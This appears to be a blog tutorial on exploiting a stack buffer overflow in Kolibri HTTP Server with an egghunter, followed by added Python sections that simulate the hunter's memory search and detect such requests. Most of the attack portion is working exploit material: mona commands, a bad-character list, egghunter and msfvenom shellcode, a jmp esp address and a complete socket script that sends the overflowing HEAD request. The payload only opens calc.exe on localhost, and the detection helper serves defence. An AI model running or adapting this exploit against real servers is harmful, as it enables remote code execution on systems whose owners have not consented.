Windows Exploit Development: Egghunting
Hey Squad,
Hope everyone is doing great!!!
Today, we will be looking at how to exploit Kolibri HTTP Server using “Egg Hunter” method.
What is Egg Hunter?
In the plain stack-based buffer overflow technique there was as much space as we needed to write the shellcode into memory.
When we examine an application that we suspect is vulnerable to a buffer overflow, the memory area we control at the crash may not have enough room for the shellcode. In that case the shellcode is sent in a second part, lands in a different region of memory, and is prefixed with a TAG (such as ROOT or w00t). A small first-stage payload, the egghunter, searches memory for that TAG, and once it detects it the shellcode that follows the TAG is run. This is the egghunter logic.
An app that you can exploit with Stack-based BoF and Egg Hunter can look like the screenshot below on memory.
As seen in the screenshot, only 190 bytes of our shellcode could fit. We do not have enough space.
The Solution: Egg Hunter Method
In such cases, the egghunter method will save lives. Briefly, the egghunter shellcode we will use performs the following process.
The label “w00t” is set in the code itself; this label is called the egg. The egghunter searches the whole of memory for this tag and, when it finds it, jumps there with the “jmp edi” instruction and executes our shellcode, which is what we wanted.
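To make the search loop concrete, here is an added Python model of what the egghunter bytes shown later in this post do; it is illustrative code written for this article, not the post's own exploit, and it does not run against any target. The "memory image", the page layout and the NOP stand-in for the second-stage shellcode are constructed for the example. It also shows why the egg is written twice ("w00tw00t"): the 4-byte tag occurs once inside the hunter itself, as the immediate of mov eax, so a single-copy search would find the hunter before the shellcode.

```python
# Added model of the egghunter's search loop; illustrative Python, not the
# post's own code and not something that runs on a target.
EGG = b"w00t"        # the 4-byte tag the post uses
PAGE_SIZE = 0x1000   # the hunter advances a whole page at a time over unmapped memory

# The egghunter bytes from the post. The tag occurs exactly ONCE inside them, as the
# immediate operand of "mov eax, 'w00t'" (\xb8 w 0 0 t), which is why the hunter
# searches for the tag twice in a row: a single copy would match the hunter itself.
EGGHUNTER = (b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef"
             b"\xb8w00t\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")

FAKE_PAYLOAD = b"\x90" * 8   # constructed stand-in for the second stage (just NOPs)

def hunt(image, unmapped_pages=frozenset(), egg=EGG, copies=2, page_size=PAGE_SIZE):
    """Return the address the hunter's final 'jmp edi' would land on, or None.

    image: flat bytes standing in for the process address space, starting at 0.
    unmapped_pages: page indices the probe syscall would reject. The real hunter
    calls NtAccessCheckAndAuditAlarm (int 0x2e) on edx before every compare and,
    on STATUS_ACCESS_VIOLATION ('cmp al, 5'), moves to the next page
    ('or dx, 0xfff' followed by 'inc edx').
    """
    wanted = egg * copies
    addr = 0
    while addr + len(wanted) <= len(image):
        page = addr // page_size
        if page in unmapped_pages:
            addr = (page + 1) * page_size      # skip the whole unreadable page
            continue
        # Two 'scasd' compares: each checks a dword at edi and advances edi by 4.
        if image[addr:addr + len(wanted)] == wanted:
            return addr + len(wanted)          # edi now points at the byte after the egg
        addr += 1                              # 'inc edx': try the next byte
    return None

def build_image(page_size=PAGE_SIZE):
    """Three constructed pages: hunter in page 0, a decoy egg in page 1, the real egg in page 2."""
    page0 = bytearray(b"A" * page_size)
    page0[0x200:0x200 + len(EGGHUNTER)] = EGGHUNTER
    page1 = bytearray(b"B" * page_size)
    page1[0:8] = EGG * 2                              # decoy: this page gets marked unmapped
    page2 = bytearray(b"C" * page_size)
    marker = EGG * 2 + FAKE_PAYLOAD
    page2[0x100:0x100 + len(marker)] = marker
    return bytes(page0 + page1 + page2)

if __name__ == "__main__":
    image = build_image()
    landing = hunt(image, unmapped_pages={1})
    print(hex(landing), image[landing:landing + len(FAKE_PAYLOAD)] == FAKE_PAYLOAD)   # 0x2108 True
    # With a single copy of the tag the hunter finds its own 'mov eax' immediate first:
    print(hex(hunt(image, unmapped_pages={1}, copies=1)))                          # 0x216
```

Running it shows the hunter skipping the decoy in the unmapped page 1 and landing just past the doubled egg in page 2; with copies=1 it stops inside its own bytes at 0x216, which is the practical reason the post's shellcode is prefixed with "w00tw00t" rather than "w00t".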
Exploit Development
File: https://www.exploit-db.com/exploits/34059
Analyze the Exploit Situation
Let’s use the below script to reproduce the crash.
After looking in Immunity Debugger, the situation is the following:
- EIP is getting overwritten.
- We have more than 500 bytes in the initial buffer that can be used to store the main shellcode.
Redirect control to the stack
Find instructions to jump to stack using mona
!mona jmp -r esp
Update the EIP value in the exploit with the address of the “jmp esp” instruction accordingly.
Find bad characters
Once we are able to jump to esp, we should check for bad characters.
badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
payload = "A" * (515 - len(badchars)) + badchars + "BBBB" + "C" * 400
You will observe that the bad characters are “\x00\x20\x3f”.
Implement the egghunter
The targeted marker tag is “w00t”. Mona can generate an egghunter for that tag with the command below.
!mona egg -t w00t
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8w00t\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
Final Exploit
Let’s use msfvenom for the shellcode.
msfvenom -p windows/exec cmd=calc.exe -b "\x00\x20\x3f" -f c
Full exploit code:
#!/usr/bin/python
import socket, os, sys
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8w00t\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
sc = ("\xbf\x9a\xfc\xd9\xc5\xdb\xd3\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
"\x31\x83\xeb\xfc\x31\x7b\x0f\x03\x7b\x95\x1e\x2c\x39\x41\x5c"
"\xcf\xc2\x91\x01\x59\x27\xa0\x01\x3d\x23\x92\xb1\x35\x61\x1e"
"\x39\x1b\x92\x95\x4f\xb4\x95\x1e\xe5\xe2\x98\x9f\x56\xd6\xbb"
"\x23\xa5\x0b\x1c\x1a\x66\x5e\x5d\x5b\x9b\x93\x0f\x34\xd7\x06"
"\xa0\x31\xad\x9a\x4b\x09\x23\x9b\xa8\xd9\x42\x8a\x7e\x52\x1d"
"\x0c\x80\xb7\x15\x05\x9a\xd4\x10\xdf\x11\x2e\xee\xde\xf3\x7f"
"\x0f\x4c\x3a\xb0\xe2\x8c\x7a\x76\x1d\xfb\x72\x85\xa0\xfc\x40"
"\xf4\x7e\x88\x52\x5e\xf4\x2a\xbf\x5f\xd9\xad\x34\x53\x96\xba"
"\x13\x77\x29\x6e\x28\x83\xa2\x91\xff\x02\xf0\xb5\xdb\x4f\xa2"
"\xd4\x7a\x35\x05\xe8\x9d\x96\xfa\x4c\xd5\x3a\xee\xfc\xb4\x50"
"\xf1\x73\xc3\x16\xf1\x8b\xcc\x06\x9a\xba\x47\xc9\xdd\x42\x82"
"\xae\x12\x09\x8f\x86\xba\xd4\x45\x9b\xa6\xe6\xb3\xdf\xde\x64"
"\x36\x9f\x24\x74\x33\x9a\x61\x32\xaf\xd6\xfa\xd7\xcf\x45\xfa"
"\xfd\xb3\x08\x68\x9d\x1d\xaf\x08\x04\x62")
shellcode = "w00tw00t" + sc
payload1 = shellcode + "A"*(515-len(shellcode)) + "\xA4\x10\x3D\x77" + egghunter + "C"*100 #jmp esp 773D10A4
buffer = (
"HEAD /" + payload1 + " HTTP/1.1\r\n"
"Host: 127.0.0.1:8080\r\n"
"User-Agent: " + "Exploit Writer" + "\r\n"
"Keep-Alive: 115\r\n"
"Connection: keep-alive\r\n\r\n")
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect(("127.0.0.1", 8080))
expl.send(buffer)
expl.close()
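From the defender's side, the request above has several properties a server log or inline inspection can key on: a request-target far longer than any legitimate path, raw non-printable bytes in the target (a URI should be printable ASCII), the doubled egg tag, and the opening opcode sequence of the egghunter shown on this page. The following Python is an added detection helper written for this article, not part of the original post or of Kolibri; the three request samples are constructed (the "attack-like" one follows the post's layout but carries NOPs instead of a payload), and MAX_TARGET_LEN is an assumed threshold to tune to what your server normally sees.

```python
# Added detection helper; not part of the original post. The request samples
# below are constructed for the example, and MAX_TARGET_LEN is an assumed threshold.

# Leading bytes of the NtAccessCheckAndAuditAlarm egghunter shown on the page:
#   or dx,0xfff ; inc edx ; push edx ; push 2 ; pop eax ; int 0x2e
EGGHUNTER_PREFIX = b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e"
# Egg tags that appear on the page (the post's own tag and mona's example tag).
KNOWN_EGGS = (b"w00t", b"b33f")
MAX_TARGET_LEN = 512   # assumed: the Kolibri overflow needs more than 515 bytes in the target

def inspect_request(raw):
    """Inspect one raw HTTP request (bytes) and return a dict of indicators."""
    request_line = raw.split(b"\r\n", 1)[0]
    parts = request_line.split(b" ")
    target = parts[1] if len(parts) == 3 else request_line
    return {
        "method": parts[0] if len(parts) == 3 else None,
        "target_length": len(target),
        # A request-target should be printable ASCII; raw opcode bytes are not.
        "nonprintable": sum(1 for b in target if not 0x21 <= b <= 0x7e),
        "egghunter": EGGHUNTER_PREFIX in raw,
        # The hunter looks for the tag twice in a row, so that is what we look for too.
        "egg": next((e for e in KNOWN_EGGS if e * 2 in raw), None),
    }

def is_suspicious(report):
    """True if any single indicator fires; each one alone is worth an alert here."""
    return (report["target_length"] > MAX_TARGET_LEN
            or report["nonprintable"] > 0
            or report["egghunter"]
            or report["egg"] is not None)

# Constructed samples. ATTACK_LIKE mirrors the post's request layout with NOPs in
# place of any payload so the example stays inert.
BENIGN = b"HEAD / HTTP/1.1\r\nHost: 127.0.0.1:8080\r\n\r\n"
LONG_PATH = b"GET /" + b"a" * 600 + b" HTTP/1.1\r\nHost: 127.0.0.1:8080\r\n\r\n"
ATTACK_LIKE = (b"HEAD /" + b"w00tw00t" + b"\x90" * 40 + b"A" * 500 + EGGHUNTER_PREFIX
               + b" HTTP/1.1\r\nHost: 127.0.0.1:8080\r\nConnection: keep-alive\r\n\r\n")

if __name__ == "__main__":
    for name, req in (("benign", BENIGN), ("long_path", LONG_PATH), ("attack_like", ATTACK_LIKE)):
        report = inspect_request(req)
        print(name, "SUSPICIOUS" if is_suspicious(report) else "ok", report)
```

The length check alone catches the crash trigger (anything over 515 bytes in the target overwrites EIP), while the non-printable and signature checks catch the egghunter stage even when a different padding length is used; a Snort or Suricata content rule on EGGHUNTER_PREFIX expresses the same idea at the network edge.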
Please give me a clap if you found it to be useful and follow me to get more hacking knowledge.
You can buy me a coffee if you would like to -> https://www.buymeacoffee.com/gowthamaraj